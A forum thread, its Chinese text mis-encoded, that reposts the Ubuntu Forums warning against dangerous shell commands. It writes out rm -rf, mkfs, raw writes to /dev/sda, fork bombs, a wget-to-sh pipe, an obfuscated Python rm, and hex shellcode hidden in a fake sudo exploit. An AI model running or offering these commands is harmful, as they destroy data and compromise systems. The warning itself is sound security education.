Znn3bq.jpeg
²é¿´: 715  |  »Ø¸´: 1
µ±Ç°Ö÷ÌâÒѾ­´æµµ¡£

dnp

ÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)

Сľ³æÀË×Ó

ÓÅÐã°æÖ÷

[½»Á÷] [תÌù]Çë²»ÒªÖ´ÐÐÈçÏÂÀàËÆÃüÁî--UbuntuΣÏÕÃüÁî

×î½üubuntu¹Ù·½ÂÛ̳·¢³öÁ˹ٷ½Í¨¸æ, ÁгöÏÂÁÐΣÏÕÃüÁî, ¸æ½ëÓû§²»ÒªÖ´ÐÐ, ²¢¶ÔËæÒâÕÅÌùÏÂÁÐÃüÁîµÄÕʺŴ¦ÒÔÖ±½Ó·âºÅµÄ´¦·£.


ÔÙ´ÎÉùÃ÷, Çë²»ÒªÖ´ÐÐÏÂÁлòÀàËÆÏÂÁеÄÃüÁî, ÕâЩÃüÁ»á¶ÔÄãµÄ¼ÆËã»úÔì³ÉÑÏÖØÓ°Ïì.

Çë²»ÒªÒÔʲô¸øÆÕͨÓû§½ÌѵÀ´Ìá¸ßËûÃǵݲȫÒâʶµÈµÈÍдÊÀ´Îª×Ô¼º²»»³ºÃÒâµÄÐÐΪ×÷Ϊ½è¿Ú!

http://ubuntuforums.org/announcement.php?a=54

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
ÏÂÁÐÃüÁî»áɾ³ýËùÓÐÎļþ, ɾ³ýµ±Ç°Ä¿Â¼, ɾ³ýµ±Ç°Ä¿Â¼ÏÂÃæµÄÎļþ.

´úÂë:

rm -rf /
rm -rf .
rm -rf *


Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
ÏÂÁÐÃüÁî»á´Ý»ÙÕû¸öÎļþϵͳ, ÖØ½¨·ÖÇø.

´úÂë:

mkfs
mkfs.ext3
mkfs.anything


Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
ÏÂÁÐÃüÁî»áÇå¿ÕÕû¸öÓ²ÅÌ.

´úÂë:
any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
ÏÂÁÐÃüÁî»áÆô¶¯´óÁ¿½ø³Ì, µ¼ÖÂϵͳÎÞ·¨ÏìÓ¦, Ö»ÄÜÓ²ÖØÆô»úÆ÷, ¿ÉÄܻᵼÖÂÊý¾ÝËðº¦.

´úÂë:
){:|:&};:


In Perl


´úÂë:
fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
²»ÒªÖ´ÐÐÄã²»ÐÅÈεÄÈËÌṩµÄshell½Å±¾, ÀïÃæ¿ÉÄܺ¬ÓÐΣÏÕµÄÃüÁîºÍ½Å±¾, ²»ÒªËæÒâ½âѹ±ðÈËÌṩµÄѹËõ°ü, Ò²Ðí¿´ÆðÀ´ºÜС, ½á¹û½âѹ³öÀ´»áÈûÂúÕû¸öÓ²ÅÌ.

´úÂë:

wget http://some_place/some_file
sh ./some_file




´úÂë:
wget http://some_place/some_file -O- | sh


Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:

²»Òª±àÒëÔËÐбðÈËÌṩµÄ²»Ã÷´úÂë

´úÂë:
char esp[] __attribute__ ((section(".text")) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:


´úÂë:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
»Ø¸´´ËÂ¥
What would Jesus do?
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû

dnp

ÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)

Сľ³æÀË×Ó

ÓÅÐã°æÖ÷

¶ÔÓÚÉÏÃæµÄÁ½¸ö±íÇ飬´úÂëÊÇÕâÑùµÄ£º
ÎÒÔÚÖмä¼ÓÁËÒ»¸ö''_''£¬¿Õ¸ñµÄ¾ÍÒÔ¿Õ¸ñ´úÌæ£¬ÒÔ·ÀÖ¹ÔÙÉú³É±íÇ飺
µÄ´úÂ룺:_(
µÄ´úÂ룺(
What would Jesus do?
2Â¥2007-12-12 21:52:48
ÒÑÔÄ   »Ø¸´´ËÂ¥   ¹Ø×¢TA ¸øTA·¢ÏûÏ¢ ËÍTAºì»¨ TAµÄ»ØÌû
Ïà¹Ø°æ¿éÌø×ª ÎÒÒª¶©ÔÄÂ¥Ö÷ dnp µÄÖ÷Ìâ¸üÐÂ
×î¾ßÈËÆøÈÈÌûÍÆ¼ö [²é¿´È«²¿] ×÷Õß »Ø/¿´ ×îºó·¢±í
[¿¼ÑÐ] ²ÄÁÏÀà284µ÷¼Á +27 Ïë»»ÊÖ»ú²»Ïë½âÊ 2026-04-08 32/1600 2026-04-09 15:06 by ´óÄ®¹ÂÀÇÃÎ
[¿¼ÑÐ] »¯¹¤Çóµ÷¼Á£¡ +29 RichLi_ 2026-04-06 29/1450 2026-04-09 14:09 by Delta2012
[¿¼ÑÐ] ²ÄÁϵ÷¼Á +14 Ò»ÑùYWY 2026-04-05 15/750 2026-04-09 13:36 by ¹ÊÈË??
[¿¼ÑÐ] ²ÄÁÏר˶322 +14 ¹þ¹þ¹þºðºðºð¹þ 2026-04-05 14/700 2026-04-09 13:25 by 5268321
[¿¼ÑÐ] 086000µ÷¼Á +4 Ê®Æßsa 2026-04-07 4/200 2026-04-09 09:27 by Ò¼ÍùŸoǰ
[¿¼ÑÐ] 296Çóµ÷¼Á +3 Íô£¡£¿£¡ 2026-04-08 3/150 2026-04-08 22:00 by zhouyuwinner
[¿¼ÑÐ] 085501»úеӢ¶þ77×Ü·Ö294Çóµ÷¼Á£¬½ÓÊÜ¿çרҵѧϰ +5 ÊØ·¨¹«ÃñØÁ¼Í 2026-04-08 5/250 2026-04-08 21:19 by bljnqdcc
[¿¼ÑÐ] µ÷¼ÁÇóÖú£¨ÉúÎïÓëÒ½Ò©£© +6 @6952 2026-04-06 6/300 2026-04-07 23:52 by lys0704
[¿¼ÑÐ] 307Çóµ÷¼Á +3 Youth@@ 2026-04-07 3/150 2026-04-07 09:25 by СºÚ²»ÅÂÄÑ
[¿¼ÑÐ] һ־Ը̫ԭÀí¹¤´óѧ¼ÆËã»ú¼¼Êõר˶348£¬Çóµ÷¼ÁÖ¸µ¼ +3 nexious 2026-04-05 3/150 2026-04-07 08:19 by jp9609
[¿¼ÑÐ] ÉúÎïѧѧ˶Çóµ÷¼Á£º351·ÖÒ»Ö¾Ô¸ÄϾ©Ê¦·¶´óѧÉúÎïѧרҵ +6 ¡­¡«¡¢Íõ¡­¡« 2026-04-06 7/350 2026-04-06 18:54 by macy2011
[¿¼ÑÐ] 362Çóµ÷¼ÁÒ»Ö¾Ô¸ÖйúʯÓÍ´óѧ +4 ÎÒÒª¿¼´ó 2026-04-06 6/300 2026-04-06 14:11 by Î޼ʵIJÝÔ­
[¿¼ÑÐ] ²ÄÁÏÓ뻯¹¤371Çóµ÷¼Á +14 ÅãÁÕ¿´º£ 2026-04-04 15/750 2026-04-06 06:59 by houyaoxu
[¿¼ÑÐ] ²ÄÁÏר˶322·Ö +10 ¹þ¹þ¹þºðºðºð¹þ 2026-04-04 10/500 2026-04-05 21:22 by ѧԱ8dgXkO
[¿¼ÑÐ] 08ר˶275µ÷¼Á +5 AaAa7420 2026-04-05 5/250 2026-04-05 18:01 by jkddd
[¿¼ÑÐ] 284Çóµ÷¼Á +7 Ðìͬѧ_001 2026-04-04 13/650 2026-04-05 17:19 by yulian1987
[¿¼ÑÐ] ²ÄÁϵ÷¼Á +12 Ò»ÑùYWY 2026-04-04 12/600 2026-04-05 08:24 by 544594351
[¿¼ÑÐ] 331Çóµ÷¼Á +3 niby 2026-04-02 3/150 2026-04-04 19:56 by À¶ÔÆË¼Óê
[¿¼ÑÐ] 306Çóµ÷¼Á +3 hybÉÏÃû¹¤ 2026-04-02 3/150 2026-04-04 18:12 by ÈÈÇéɳĮ
[¿¼ÑÐ] 11408£¬284·Ö£¬¶þÕ½Õæ³ÏÇóµ÷¼Á +4 12.27 2026-04-02 4/200 2026-04-03 14:14 by dxiaoxin
ÐÅÏ¢Ìáʾ
ÇëÌî´¦ÀíÒâ¼û